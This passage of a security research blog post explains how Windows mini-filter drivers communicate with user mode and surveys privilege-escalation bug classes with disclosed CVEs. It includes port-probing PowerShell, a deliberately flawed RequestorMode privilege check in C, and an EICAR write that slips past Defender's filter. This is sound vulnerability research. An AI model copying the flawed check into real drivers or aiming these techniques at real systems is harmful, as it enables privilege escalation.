status code. This allows the driver to do things like verify the caller is in a signed binary or similar, which is likely something security products will do. \n\nIf the connection is allowed the ConnectionPortCookie pointer can be updated with a pointer to an allocated structure unique to the client. This pointer will be passed back to the driver in the message and disconnect notification callbacks.\n\nYou can enumerate what ports are currently registered by inspecting the OMNS. For example, to enumerate the ports in the root of the OMNS using my [NtObjectManager](<https://www.powershellgallery.com/packages/NtObjectManager/1.1.29>) PowerShell module run the following command:\n\nPS&gt; ls NtObject:\\ | Where-Object TypeName -eq \"FilterConnectionPort\"\n\nName TypeName \n\n\\---- -------- \n\nstorqosfltport FilterConnectionPort\n\nMicrosoftMalwareProtectionRemoteIoPortWD FilterConnectionPort\n\nMicrosoftMalwareProtectionVeryLowIoPortWD FilterConnectionPort\n\nWcifsPort FilterConnectionPort\n\nMicrosoftMalwareProtectionControlPortWD FilterConnectionPort\n\nBindFltPort FilterConnectionPort\n\nMicrosoftMalwareProtectionAsyncPortWD FilterConnectionPort\n\nCLDMSGPORT FilterConnectionPort\n\nMicrosoftMalwareProtectionPortWD FilterConnectionPort \n \n--- \n \nYou might notice there is also a FilterCommunicationPort kernel object type. This is the object used for the client-end where FilterConnectionPort is the mini-filter server end. You should never see a FilterCommunicationPort named object in the OMNS.\n\nWhen the port is opened the kernel will check the security descriptor for access. Unfortunately there\u2019s no way to directly query the assigned security descriptor for a port from user-mode. The simplest way to test is to just try and open the port and see if it returns an access denied error.\n\nPS&gt; $ports = ls NtObject:\\ |\n\nWhere-Object TypeName -eq \"FilterConnectionPort\"\n\nPS&gt; foreach($port in $ports.Name) {\n\nWrite-Host \"\\$port\"\n\nUse-NtObject($p = Get-FilterConnectionPort \"\\$port\") {}\n\n}\n\n\\BindFltPort\n\nException: \"(0x80070005) - Access is denied.\"\n\n\\CLDMSGPORT\n\nException: \"(0x8007017C) - The cloud operation is invalid.\" \n \n--- \n \nWe can see two ports output in the previous code snippet. The BindFltPort port fails with an access denied error, while the CLDMSGPORT port (which is part of the Cloud Filter driver) returns \u201cThe cloud operation is invalid.\u201d. The second error indicates that we\u2019ve likely opened the port, but you\u2019ll need to supply specific parameters in the context buffer when calling the FilterConnectCommunicationPort API. You can specify the connection context for the Get-FilterConnectionPort command by specifying a byte array to the Context parameter.\n\nPS&gt; $port = Get-FilterConnectionPort -Path \"\\PORT\" -Context @(0, 1, 2, 3) \n \n--- \n \nWe can inspect the security descriptor for a port if you\u2019ve got a Windows system with a kernel debugger enabled and a copy of WinDBG.\n\n0: kd&gt; !object \\CLDMSGPORT\n\nObject: ffffb487447ff8c0 Type: (ffffb4873d67dc40) FilterConnectionPort\n\nObjectHeader: ffffb487447ff890 (new version)\n\nHandleCount: 1 PointerCount: 4\n\nDirectory Object: ffff8a8889a2d4e0 Name: CLDMSGPORT\n\n0: kd&gt; dx (((nt!_OBJECT_HEADER*)0xffffb487447ff890)-&gt;SecurityDescriptor &amp; ~0x7)\n\n(((nt!_OBJECT_HEADER*)0xffffb487447ff890)-&gt;SecurityDescriptor &amp; ~0x7) : 0xffff8a888dccb0a0\n\n0: kd&gt; !sd 0xffff8a888dccb0a0 1\n\n-&gt;Revision: 0x1\n\n-&gt;Sbz1 : 0x0\n\n-&gt;Control : 0x9004\n\nSE_DACL_PRESENT\n\nSE_DACL_PROTECTED\n\nSE_SELF_RELATIVE\n\n-&gt;Owner : S-1-5-32-544 (Alias: BUILTIN\\Administrators)\n\n-&gt;Group : S-1-5-18 (Well Known Group: NT AUTHORITY\\SYSTEM)\n\n-&gt;Dacl : \n\n-&gt;Dacl : -&gt;AclRevision: 0x2\n\n-&gt;Dacl : -&gt;Sbz1 : 0x0\n\n-&gt;Dacl : -&gt;AclSize : 0x1c\n\n-&gt;Dacl : -&gt;AceCount : 0x1\n\n-&gt;Dacl : -&gt;Sbz2 : 0x0\n\n-&gt;Dacl : -&gt;Ace[0]: -&gt;AceType: ACCESS_ALLOWED_ACE_TYPE\n\n-&gt;Dacl : -&gt;Ace[0]: -&gt;AceFlags: 0x0\n\n-&gt;Dacl : -&gt;Ace[0]: -&gt;AceSize: 0x14\n\n-&gt;Dacl : -&gt;Ace[0]: -&gt;Mask : 0x001f0001\n\n-&gt;Dacl : -&gt;Ace[0]: -&gt;SID: S-1-5-11 (Well Known Group: NT AUTHORITY\\Authenticated Users)\n\n-&gt;Sacl : is NULL \n \n--- \n \nTo dump the SD you first query for the object address of the filter communication port using the !object command. From the output you take the address of the OBJECT_HEADER structure and query the SecurityDescriptor field. Note you must clear the lower 3 bits of the address to make a valid security descriptor pointer. Finally we can print the security descriptor using the !sd command. The output shows that the security descriptor grants the Authenticated Users group access to connect to the port.\n\nWith an open handle to the port you can now send and receive messages. The filter manager supports both user to kernel and kernel to user message directions. For the user to kernel messages you call the [FilterSendMessage](<https://docs.microsoft.com/en-us/windows/win32/api/fltuser/nf-fltuser-filtersendmessage>) API which sends a raw memory buffer to the filter driver and returns a separate buffer as shown in the following prototype:\n\nHRESULT FilterSendMessage(\n\nHANDLE hPort,\n\nLPVOID lpInBuffer,\n\nDWORD dwInBufferSize,\n\nLPVOID lpOutBuffer,\n\nDWORD dwOutBufferSize,\n\nLPDWORD lpBytesReturned\n\n); \n \n--- \n \nThe message is delivered to the filter driver\u2019s message notification callback specified when registering the mini-filter. The callback has the following prototype.\n\ntypedef NTSTATUS\n\n(*PFLT_MESSAGE_NOTIFY) (\n\nIN PVOID PortCookie,\n\nIN PVOID InputBuffer OPTIONAL,\n\nIN ULONG InputBufferLength,\n\nOUT PVOID OutputBuffer OPTIONAL,\n\nIN ULONG OutputBufferLength,\n\nOUT PULONG ReturnOutputBufferLength\n\n); \n \n--- \n \nThe handling of the message is similar to a device IO control call. In fact under the hood it\u2019s implemented using the device IO control code 0x8801B. As this code uses the METHOD_NEITHER method means the InputBuffer and OutputBuffer parameters are pointers into user-mode memory. The filter manager does check them before calling the callback with ProbeForRead and ProbeForWrite calls.\n\nYou can send a message to a filter connection port in PowerShell using the Send-FilterConnectionPort command specifying the data to send and the maximum size of the output buffer.\n\nPS&gt; Send-FilterConnectionPort -Port $port -Input @(0, 1, 2, 3) -MaximumOutput 0x100 \n \n--- \n \nFor the kernel to user messages the user mode application needs to call [FilterGetMessage](<https://docs.microsoft.com/en-us/windows/win32/api/fltuser/nf-fltuser-filtergetmessage>) to wait for the filter driver to send a message to user-mode. The kernel sends a message to the waiting user mode application using the [FltSendMessage](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltsendmessage>) API which has the following prototype.\n\nNTSTATUS FltSendMessage(\n\nPFLT_FILTER Filter,\n\nPFLT_PORT *ClientPort,\n\nPVOID SenderBuffer,\n\nULONG SenderBufferLength,\n\nPVOID ReplyBuffer,\n\nPULONG ReplyLength,\n\nPLARGE_INTEGER Timeout\n\n); \n \n--- \n \nIf there\u2019s currently no waiting user mode process the API can wait a specified timeout until the application called FilterGetMessage. The returned buffer from FilterGetMessage contains a [FILTER_MESSAGE_HEADER](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltuserstructures/ns-fltuserstructures-_filter_message_header>) structure followed by the data. The header contains the size of the reply requested as well as a message ID which is used to correlate any reply to the kernel\u2019s message. \n\nTo reply the user-mode application calls the [FilterReplyMessage](<https://docs.microsoft.com/en-us/windows/win32/api/fltuser/nf-fltuser-filterreplymessage>) API. The user-mode application needs to append any data to a [FILTER_REPLY_HEADER](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltuserstructures/ns-fltuserstructures-_filter_reply_header>) structure which contains the NT status code of the operation and the correlated message ID. The FltSendMessage API waits for the user-mode application to call FilterReplyMessage with the correct ID, and returns a buffer to the kernel-mode code. The message notification callback is not involved when using kernel to user-mode calls.\n\n### Filter Callbacks\n\nTypically the purpose of the mini-filter callbacks would be to inspect or modify pre-existing IO requests to a file system. Therefore one way of getting untrusted data to the driver is based on how it handles IO requests. However, it\u2019s possible to add additional functionality on top of an existing file system to allow for communication between user mode and kernel mode. The filter driver can add a callback for device or file system IO control code requests and check and handle its own control codes. This allows the filter to implement additional functionality on existing files. \n\nThe following is a simple example of adding a FSCTL_REVERSE_BYTES FS IO control code to an existing file system. This FSCTL is not really supported by any filesystem.\n\n#define FSCTL_REVERSE_BYTES CTL_CODE(FILE_DEVICE_FILESYSTEM, \n\n0x801, \n\nMETHOD_BUFFERED, \n\nFILE_ANY_ACCESS)\n\nFLT_PREOP_CALLBACK_STATUS\n\nPreFsControlOperation(\n\nPFLT_CALLBACK_DATA Data,\n\nPCFLT_RELATED_OBJECTS FltObjects,\n\nPVOID* CompletionContext\n\n) {\n\nPFLT_PARAMETERS ps = &amp;Data-&gt;Iopb-&gt;Parameters;\n\nif (ps-&gt;DeviceIoControl.Common.IoControlCode != FSCTL_REVERSE_BYTES) {\n\nreturn FLT_PREOP_SUCCESS_NO_CALLBACK;\n\n}\n\nchar* buffer = ps-&gt;DeviceIoControl.Buffered.SystemBuffer;\n\nULONG length = min(ps-&gt;DeviceIoControl.Buffered.InputBufferLength,\n\nps-&gt;DeviceIoControl.Buffered.OutputBufferLength);\n\nfor (ULONG i = 0; i &lt; length; ++i)\n\n{\n\nchar tmp = buffer[i];\n\nbuffer[i] = buffer[length - i - 1];\n\nbuffer[length - i - 1] = tmp;\n\n}\n\nData-&gt;IoStatus.Status = STATUS_SUCCESS;\n\nData-&gt;IoStatus.Information = length;\n\nreturn FLT_PREOP_COMPLETE;\n\n} \n \n--- \n \nThe parameters for the FSCTL or IOCTL are separated based on the method of buffer access. In this case the FSCTL uses METHOD_BUFFERED so the parameters are accessed through the Buffered field. The filter driver needs to ensure it handles correctly all buffer types if it wants to implement its own control codes.\n\nThis technique is used by the Windows Overlay Filter (WOF). For example, the FSCTL code [FSCTL_SET_EXTERNAL_BACKING](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/fsctl-set-external-backing>) is not supported by NTFS. Instead it\u2019s intercepted by a pre-operation callback in the WOF filter which completes it before it reaches the NTFS driver. The NTFS driver never sees the control code, unless the WOF driver happens to not be enabled.\n\n### Reparse Points\n\nReparse point buffers are most commonly known for implementing symbolic link support for NTFS. However the reparse point feature of NTFS can store arbitrary tagged data which is used by filter drivers to store additional offline state information for a file. For example, WOF uses its own reparse buffer, with the tag IO_REPARSE_TAG_WOF to store the location of the real file or status of a compressed file.\n\nA user-mode application would set, query and delete using FSCTL control codes, such as [FSCTL_SET_REPARSE_POINT](<https://docs.microsoft.com/en-us/windows/win32/api/winioctl/ni-winioctl-fsctl_set_reparse_point>). The recommended way a mini-filter driver should set and delete a file\u2019s reparse buffer is through the [FltTagFile](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-flttagfile>) (and [FltTagFileEx](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-flttagfileex>)) and [FltUntagFile](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltuntagfile>) APIs to set and remove the reparse buffer. Searching for the driver\u2019s imported APIs should quickly show whether the driver uses its own reparse buffer format.\n\nTo open a file with the supported reparse point buffer the driver could register for the post-create callback and wait for any request which returns the STATUS_REPARSE NT status then query for the reparse point data from the TagData field in the FLT_CALLBACK_DATA parameter. If the reparse tag matches one the filter driver supports it can re-issue the create request but specify the FILE_OPEN_REPARSE_POINT flag to open the file and ignore the reparse point. There are many problems with this, not least it requires two IO requests for a single creation and the driver would have to process every reparse event.\n\nTo simplify this Windows 10 supports the ECP_TYPE_OPEN_REPARSE_GUID ECP. You add the ECP with a buffer containing an [OPEN_REPARSE_LIST_ENTRY](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/ns-ntifs-_open_reparse_list_entry>) structure which defines the reparse tag the driver handles. When NTFS encounters a reparse point buffer it checks to see if it\u2019s in the open reparse list. If so instead of returning STATUS_REPARSE the OPEN_REPARSE_POINT_TAG_ENCOUNTERED flag is set in the OPEN_REPARSE_LIST_ENTRY structure, the file is opened and success NT status code is returned. The filter driver can then check for the flag in the post-create callback, if set it can query the reparse tag from the file, for example using [FSCTL_GET_REPARSE_POINT](<https://docs.microsoft.com/en-us/windows/win32/api/winioctl/ni-winioctl-fsctl_get_reparse_point>) and handle accordingly.\n\nThe filter manager also exposes the [FltAddOpenReparseEntry](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltaddopenreparseentry>) and [FltRemoveOpenReparseEntry](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/fltkernel/nf-fltkernel-fltremoveopenreparseentry>) to simplify adding and removing these open reparse list entries. Searching for use of these APIs should give you an idea if the filter driver implements its own reparse point format.\n\nThe reason I mention this in the context of communication is that a filter driver will process these reparse buffers when accessing the file system. The NTFS driver only checks for the SeCreateSymbolicLinkPrivilege privilege if a user is writing the IO_REPARSE_TAG_SYMLINK tag. NTFS delegates the verification of the [REPARSE_DATA_BUFFER](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/ns-ntifs-_reparse_data_buffer>) structure which will be written to the file system by calling the kernel API [FsRtlValidateReparsePointBuffer](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-fsrtlvalidatereparsepointbuffer>). The kernel API only does basic length checks for non-symlink tag types so the arbitrary bytes set in the DataBuffer field can be completely untrusted, which can allow for security issues during parsing.\n\n## Security Bug Classes\n\nI\u2019ve now provided examples of how a mini-filter operates and how you can communicate with it. Let\u2019s finish up with an overview of potential bug classes to look for when doing a review. Some of these bug classes are common to any kernel driver, but others are very specifically due to the way mini-filters operate. \n\nWhere possible I\u2019ll also provide an example of a vulnerability I\u2019ve discovered to improve understanding. Note, this is not an exhaustive list, I\u2019m sure there are some novel bug classes that I don\u2019t know about which are missing from this list. Which is why it\u2019s good to describe this process in more detail so others can take advantage of my knowledge and find new and interesting issues.\n\nTo aid in analysis I\u2019ve uploaded my header file I use in IDA Pro to populate the filter manager types. You can get it from [github](<https://gist.github.com/tyranid/49d8a1b9e53bba4eac40df32e15d4a98>). I\u2019ve tried to ensure it\u2019s correct and up to date, but there\u2019s a chance that it is not. YMMV.\n\n### Common and garden variety memory safety hazards\n\nBeing native C code you can expect the same sorts of issues you\u2019d find in any sizable code base including integer wrapping and incorrect reference counting leading to memory safety hazards. Any of the described communication methods could result in untrusted data being processed and mishandled. I don\u2019t think I need to describe this in any detail.\n\n### Ignoring the RequestorMode Value\n\nAll filtered IO requests have an assigned RequestorMode parameter in the FLT_CALLBACK_DATA structure which indicates whether it originated from user or kernel mode code. If an IO request is dispatched from kernel mode code the IO manager and file system drivers typically disable security checks, such as file access checking.\n\nThere are a couple of related bug classes you\u2019ll see with regards to RequestorMode. The first class is the filter driver ignoring its value. This can be a problem if the filter driver redirects the IO request to another file either directly or by using a reparse operation during file creation. \n\nFor example, [CVE-2018-0877](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1452>) was an issue I found in the WCIFS driver which provides file system virtualization for Desktop Bridge applications. The root cause was the driver would reparse to a user controllable location if the requested file didn\u2019t exist in privileged Windows directories.\n\nIt\u2019s common to find kernel code opening files inside privileged directories with RequestorMode set to the kernel. The kernel code can make the assumption this can\u2019t be tampered with as only an administrator can normally modify those directories. The end result was a normal user application could get a file opened in the user controllable location but with access checking disabled. In the proof-of-concept in the issue tracker I exploit this to redirect a request for a National Language Support (NLS) file to ready arbitrary files on disk such as the SAM hive. The technique was described separately in [this blog post](<https://googleprojectzero.blogspot.com/2017/08/windows-exploitation-tricks-arbitrary.html>).\n\n### Incorrect RequestorMode Check.\n\nThe second bug class in checking the RequestorMode can occur during a file create operation. Specifically the RequestorMode field is checked but the driver does not verify if access checking has been re-enabled through the IO_FORCE_ACCESS_CHECK flag passed to IoCreateFile and variants. For a bit more context on this bug class refer [to my blog post](<https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html>) from last year where I collaborated with Microsoft on related issues.\n\nFLT_PREOP_CALLBACK_STATUS\n\nPreCreateOperation(\n\nPFLT_CALLBACK_DATA Data,\n\nPCFLT_RELATED_OBJECTS FltObjects,\n\nPVOID* CompletionContext\n\n) {\n\nif (!SeSinglePrivilegeCheck(SeExports-&gt;SeTcbPrivilege,\n\nData-&gt;RequestorMode)) {\n\nData-&gt;IoStatus.Status = STATUS_ACCESS_DENIED;\n\nreturn FLT_PREOP_COMPLETE;\n\n}\n\n// Perform some privileged action.\n\nreturn FLT_PREOP_SUCCESS_WITH_CALLBACK;\n\n} \n \n--- \n \nThe example above shows misuse of the RequestorMode field. It passes it directly to [SeSinglePrivilegeCheck](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-sesingleprivilegecheck>), if it indicates the call came from the kernel then the privilege check will always return TRUE meaning the privileged action will be taken. If you read the linked blog post, this can happen if the file is opened through calling IoCreateFileEx or similar APIs with incorrect flags.\n\nTo guard against this issue the driver needs to check if the SL_FORCE_ACCESS_CHECK flag has been set in the OperationFlags field of the FLT_IO_PARAMETER_BLOCK structure. If that flag is set the value of RequestorMode should always be assumed to be from user mode.\n\n### Driver and Kernel IO Operation Mismatch\n\nThe Windows platform is constantly iterating new features, this is even more true since the release of Windows 10 and its six month release cycles. This can introduce new features to the IO stack such as new information classes or IO control codes or additional functionality to existing features.\n\nFor the most part the mini-filter driver can just ignore operations it doesn\u2019t care about. However, if it does process an IO operation it needs to match with what\u2019s implemented in the rest of the OS, which can be difficult if the OS changes around the driver.\n\nAn example of this issue is the WOF driver\u2019s handling of reparse points. To prevent applications from setting arbitrary reparse points with the IO_REPARSE_TAG_WOF tag it handles the FSCTL_SET_REPARSE_POINT IO control code and rejects any attempt to set a reparse point buffer with that tag. To complete the trick the driver also hides a file\u2019s reparse point from being queried or removed if it\u2019s set to IO_REPARSE_TAG_WOF.\n\nThe issue [CVE-2020-17139](<https://bugs.chromium.org/p/project-zero/issues/detail?id=2088>) resulted from the OS adding a new [FSCTL_SET_REPARSE_POINT_EX](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/fsctl-set-reparse-point-ex>) IO control code which the WOF driver didn\u2019t handle. This allowed an application to add or remove the WOF IO tag which resulted in a way of getting an arbitrary file to have a cached code signature to bypass mechanisms such as [Windows Defender Application Control](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/windows-defender-application-control>). \n\n### Altitude sickness.\n\nSorry, I couldn\u2019t resist the pun. This is a bug class which is caused by the ordering of filter operations based on the assigned altitudes of the driver. For example, if you look at the list of filters from the fltmc command shown earlier in this blog post you\u2019ll notice that WdFilter which is the real-time scanner for Windows Defender is at a much higher altitude than LUAFV which is the UAC file virtualization driver. \n\nWhat this means is if LUAFV performs some operations, such as calling FltCreateFileEx which only dispatches the IO request to filters below LUAFV then Windows Defender will miss the file operations and not be able to act on them. Let\u2019s show this in action with a simple PowerShell script.\n\nfunction Write-EICAR {\n\nparam([string]$Path)\n\n# Replace with a real EICAR string.\n\n$eicar = [System.Text.Encoding]::ASCII.GetBytes(\"&lt;EICAR&gt;\")\n\nUse-NtObject($f = New-NtFile -Win32Path $Path -Disposition OpenIf -Access ReadData, WriteData) {\n\n$f.Length = 0\n\nWrite-NtFile $f $eicar -Offset 0\n\n}\n\n}\n\nPS&gt; Write-EICAR -Path \"$env:TEMP\\eicar.txt\"\n\nPS&gt; Enable-NtTokenVirtualization\n\nPS&gt; Write-EICAR -Path \"$env:windir\\system32\\license.rtf\" \n \n--- \n \nThe Write-EICAR function opens or creates a new file at a specified path, truncates the file to a zero length, writes the EICAR string then closes the file. Note I\u2019ve replaced the EICAR string with the dummy &lt;EICAR&gt;. You\u2019ll need to look up the real string online and replace it before running the test. I did this to prevent some overzealous AV detecting the EICAR string and quarantining this web page.\n\nWe create an EICAR file in the temporary folder. Once the file has been closed Windows Defender\u2019s real-time scanner should scan it and warn the user that it has quarantined the file.\n\n[](<https://1.bp.blogspot.com/-tLMq6lEXKNM/X_9xluZ7oVI/AAAAAAAAaoc/moryf-kgfIs6Ch3zgrEwPikMez6fqZsQgCNcBGAsYHQ/s462/eicar_quarantine.PNG>)\n\nHowever, once we enable virtualization using Enable-NtTokenVirtualization and write to an existing system file the file processing is handled inside the LUAFV driver after WdFilter has done its checking. Therefore the second command will succeed, although the file which is actually created is in the user\u2019s virtual store, we\u2019ve not overwritten license.rtf.\n\nWorth pointing out that this only allows you to create the file on disk. The instant that virtualized file is used by any application Windows Defender will see it and quarantine it. Therefore it provides no real value to bypass Windows Defender\u2019s signature checks. However, I think this is an interesting demonstration of the types of issues you could find due to the differing altitudes.\n\nThe mismatch with the filter altitude is also a potential reason you\u2019ll miss file events in [Process Monitor](<https://docs.microsoft.com/en-us/sysinternals/downloads/procmon>). Process Monitor runs its mini-filter to capture file events at altitude 385200 which is above LUAFV. You will not see most direct virtualization events. However we can do something about this, we can use fltmc to detach the Process Monitor filter from a volume and reattach at a much lower altitude. Start Process Monitor then run the following commands to reattach to the C: drive.\n\nC:\\&gt; fltmc detach PROCMON24 C:\n\nC:\\&gt; fltmc attach PROCMON24 C: -i \"Process Monitor 24 Instance\" -a 100 \n \n--- \n \nYou might need to replace 24 with an appropriate version number for your version of Process Monitor. You should start seeing more events which were previously hidden by LUAFV and other filter drivers at lower altitudes. This should help you monitor file access for any interesting behavior. Sadly even though you can try and attach the Process Monitor filter to the named pipe device it won\u2019t work as the driver doesn\u2019t indicate support for that device.\n\nNote, that stopping and starting the Process Monitor capture will reset the volume instances for the filter driver and remove the low altitude instance. If you create the new instance without the instance name (the string after -i) then it won\u2019t get deleted, however Process Monitor will show duplicate entries for any IO request which is the same at both altitudes. The Process Monitor driver does not support attaching at a different altitude through any command line options, this would be one of those cases where it\u2019d be useful for this tooling to be [open source](<https://twitter.com/tiraniddo/status/1284139369788563456>) so that this feature could be added.\n\nAs an example before adding the low altitude instance if you create the EICAR test file you\u2019ll see the following events:\n\nID\n\n| \n\nPath\n\n| \n\nOperation\n\n| \n\nResult\n\n| \n\nDetail \n \n---|---|---|---|--- \n \n0\n\n| \n\nC:\\Windows\\System32\\license.rtf\n\n| \n\nCreateFile\n\n| \n\nSUCCESS\n\n| \n\nDesired Access: Read Data, Write Data \n \n1\n\n| \n\nC:\\Windows\\System32\\license.rtf\n\n| \n\nSetEndOfFile\n\n| \n\nSUCCESS\n\n| \n\nEndOfFile: 0 \n \n2\n\n| \n\nC:\\Users\\admin\\AppData\\Local\\VirtualStore\\Windows\\System32\\license.rtf\n\n| \n\nWriteFile\n\n| \n\nSUCCESS\n\n| \n\nOffset: 0, Length: 68 \n \n3\n\n| \n\nC:\\Users\\admin\\AppData\\Local\\VirtualStore\\Windows\\System32\\license.rtf\n\n| \n\nCloseFile\n\n| \n\nSUCCESS\n\n| \n \nI\u2019ve added an ID column which indicates the event taking place. The events match the code for creating the EICAR file, we open the file for read and write access, set the length to 0, write the EICAR string and then close the file. Note that in event ID 2 the path to the file has changed from the original one in system32 to the virtual store. This is because the file is \u201cdelay virtualized\u201d so it\u2019ll only be created if a write IO request, such as changing the file length, is dispatched to the file.\n\nNow let\u2019s compare the events when the altitude is set to 100:\n\nID\n\n| \n\nPath\n\n| \n\nOperation\n\n| \n\nResult\n\n| \n\nDetail \n \n---|---|---|---|--- \n \n0\n\n| \n\nC:\\Windows\\System32\\license.rtf\n\n| \n\nCreateFile\n\n| \n\nACCESS DENIED\n\n| \n\nDesired Access: Read Data, Write Data \n \n| \n\nC:\\Windows\\System32\\license.rtf\n\n| \n\nCreateFile\n\n| \n\nSUCCESS\n\n| \n\nDesired Access: Read Data \n \n1\n\n| \n\nC:\\Windows\\System32\\license.rtf\n\n| \n\nCreateFile\n\n| \n\nSUCCESS\n\n| \n\nDesired Access: Read Data, Read Attributes \n \n| \n\nC:\\Users\\admin\\AppData\\Local\\VirtualStore\\Windows\\System32\\license.rtf\n\n| \n\nCreateFile\n\n| \n\nSUCCESS\n\n| \n\nDesired Access: Write Data, Write Attributes \n \n| \n\nC:\\Users\\admin\\AppData\\Local\\VirtualStore\\Windows\\System32\\license.rtf\n\n| \n\nSetEndOfFile\n\n| \n\nSUCCESS\n\n| \n\nEndOfFile: 538 \n \n| \n\nC:\\Windows\\System32\\license.rtf\n\n| \n\nReadFile\n\n| \n\nSUCCESS\n\n| \n\nOffset: 0, Length: 538 \n \n| \n\nC:\\Users\\admin\\AppData\\Local\\VirtualStore\\Windows\\System32\\license.rtf\n\n| \n\nWriteFile\n\n| \n\nSUCCESS\n\n| \n\nOffset: 0, Length: 538 \n \n| \n\nC:\\Windows\\System32\\license.rtf\n\n| \n\nReadFile\n\n| \n\nEND OF FILE\n\n| \n\nOffset: 538, Length: 16,384 \n \n| \n\nC:\\Users\\admin\\AppData\\Local\\VirtualStore\\Windows\\System32\\license.rtf\n\n| \n\nCloseFile\n\n| \n\nSUCCESS\n\n| \n \n| \n\nC:\\Windows\\System32\\license.rtf\n\n| \n\nCloseFile\n\n| \n\nSUCCESS\n\n| \n \n| \n\nC:\\Users\\admin\\AppData\\Local\\VirtualStore\\Windows\\System32\\license.rtf\n\n| \n\nCreateFile\n\n| \n\nSUCCESS\n\n| \n\nDesired Access: Read Data, Write Data \n \n| \n\nC:\\Users\\admin\\AppData\\Local\\VirtualStore\\Windows\\System32\\license.rtf\n\n| \n\nSetEndOfFile\n\n| \n\nSUCCESS\n\n| \n\nEndOfFile: 0 \n \n2\n\n| \n\nC:\\Users\\admin\\AppData\\Local\\VirtualStore\\Windows\\System32\\license.rtf\n\n| \n\nWriteFile\n\n| \n\nSUCCESS\n\n| \n\nOffset: 0, Length: 68, Priority: Normal \n \n3\n\n| \n\nC:\\Windows\\System32\\license.rtf\n\n| \n\nCloseFile\n\n| \n\nSUCCESS\n\n| \n \n| \n\nC:\\Users\\admin\\AppData\\Local\\VirtualStore\\Windows\\System32\\license.rtf\n\n| \n\nCloseFile\n\n| \n\nSUCCESS\n\n| \n \nYou can see that the list of events is much longer in the second case (I\u2019ve even removed some for brevity). For event 0 it\u2019s no longer a single create IO request for the license.rtf file. As the user doesn\u2019t have write access when the create call is made to the file system it results in an ACCESS DENIED error. The LUAFV driver sees the error in its post-create callback and as virtualization is enabled it makes a second create for only read access. This second create succeeds. Due to the altitude of LUAFV this process is normally hidden from the Process Monitor.\n\nIn the first table event ID 2 we saw the caller setting the file length to 0. However in the second table we now see that the virtual file needs to be created and the contents of the original file are copied into the new virtual file. Only after that operation has been completed will the length of the file be set to 0. The last 2 events are more or less the same.\n\nI hope this is a clear demonstration both of how the altitude directly affects the operation of mini-filter drivers as well as how much file information you might be missing in Process Monitor without realizing it.\n\n### Concurrency and Reentrancy\n\nThe IO manager is designed to operate asynchronously. It\u2019s possible that multiple threads could be calling into the same IO driver at the same time and the filter manager is no different. There\u2019s no explicit locking in the filter manager which would prevent multiple IO requests being dispatched at the same time to the same file object. This can lead to concurrency and reentrancy issues.\n\nThe filter driver can assign shared state based on the file stream or file object. This can be extracted in the filter when operating on the file and used to store and retrieve the current state information. If you dispatch multiple IO requests to the same file it can result in an invalid state or memory corruption issues.\n\nAn example of this kind of issue is [CVE-2019-0836](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1774>) which was a race condition in the LUAFV driver related to handling of the [SECTION_OBJECT_POINTERS](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_section_object_pointers>) structure in the file object. Basically by racing a read against a write IO request on the same file it was possible to get the wrong SECTION_OBJECT_POINTERS structure assigned to the virtual file allowing a normal user to bypass access checks and map a read-only file as writable.\n\nTo solve this problem the driver needs to not maintain complex state between pre and post operation callbacks or over any calls out to any API which could be trapped by a user-mode application. \n\n### Incorrect Forwarding of IO Operations\n\nWe showed earlier how to retarget an IO operation to another file object by switching the TargetFileObject pointer. This needs to be done very carefully as when working with file object pointers directly almost any operation can be performed on them. For example, if a file is opened read-only a write operation can still be dispatched to the file object itself and it\u2019ll succeed.\n\nThe only thing which prevents a user-mode application from doing this is the kernel checks that the handle passed by the application to the NtWriteFile system call has the FILE_WRITE_DATA access right set. If not the system call can return STATUS_ACCESS_DENIED. However, if the handle has write access to a file object, but the filter driver redirects that operation to a read-only file then the check is bypassed and the user can write to a file they don\u2019t necessarily control.\n\nAnother place this can happen is the dispatch of IO control codes. Each control code has a flag which indicates if the file handle requires read and/or write access to be dispatched. This check is performed in the IO manager before the request ever makes it to the file system. If the filter drivers blindly forward IO control codes to a separate file it could send a code which normally requires write access on the handle bypassing security checks.\n\nThe LUAFV driver is a good example of a mini-filter driver where this forwarding takes place. The previously mentioned issue, CVE-2019-0836 while it\u2019s a concurrency issue also relies on the fact that the file object can be written to even though it was opened read-only.\n\n## Summary\n\nIn summary I think that mini-filter drivers are an under-appreciated source of privilege escalation bugs on Windows. In part that\u2019s because they\u2019re not easy to understand. They have complex interactions with the rest of the IO system which makes understanding difficult but can introduce really subtle and interesting issues. I hope I\u2019ve given you enough information to better understand how mini-filter drivers function, how you communicate with them and what sorts of unique bug classes you might discover.\n\nIf you want some more information a good blog on the inner workings of filters drivers is [Of Filesystems and Other Demons](<http://fsfilters.blogspot.com/>). It\u2019s not been updated in a long while but it still contains some valuable information. You can also refer to [MSDN](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/filter-manager-concepts>) which has a fairly comprehensive section on mini-filters as well as the [Windows Driver Kit sample code](<https://github.com/microsoft/Windows-driver-samples/tree/master/filesys/miniFilter>). Finally as a reminder I\u2019ve uploaded a filter manager [header file](<https://gist.github.com/tyranid/49d8a1b9e53bba4eac40df32e15d4a98>) for use in reverse engineering tools such as IDA Pro.\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": 